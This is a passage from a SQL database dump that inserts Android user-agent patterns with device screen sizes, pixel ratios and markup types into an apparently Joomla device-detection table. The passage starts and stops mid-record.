(Linux; Android 8.*; F5321) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; F572L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; F8131) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; F8132) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; F8331) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; F8332) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; FAST73G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":450,\"screenHeight\":768,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; FEELING) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; FIG-LA1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; FIG-LX1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; FIG-LX2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; FIG-LX3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; FLA-LX1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; FLA-LX2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; FLA-LX3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; FLOW6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; FLOW6Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; FLOW6S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; FRD-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; FRD-AL10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; FRD-DL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; FRD-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; FRD-L19) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; FS8010) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":680,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; FS8032) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; FUN S1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Fero Vibe) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Fresh_4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; G008) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; G2299) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; G253) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; G255) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; G3112) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; G3116) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; G3121) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; G3123) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; G3125) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; G3212) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; G3221) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; G3223) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; G3226) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; G3412) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; G3416) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; G3421) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; G3423) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; G3426) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; G4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; G55 LITE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; G552KL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; G553KL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; G8141) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; G8142) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; G8231) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; G8232) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; G8341) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}');
INSERT INTO `xyhmu_mj_amdd` VALUES ('Mozilla/5.0 (Linux; Android 8.*; G8342) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; G8343) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; G8441) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; GL355) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; GM 5 Plus d) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; GM 5 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; GM 6 d) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; GM 8 d) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; GM 8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; GM6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; GM7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; GM8 xx) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; GO1008) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; GO1452) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; GO3C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; GO3E) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; GO404) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; GO506) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; GO5E) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; GOME_C7_Note_Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; GS100) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; GS150) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; GS155) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; GS180) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; GS185) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; GS270 plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; GS270) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; GS280) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; GS370) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; GS370_Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 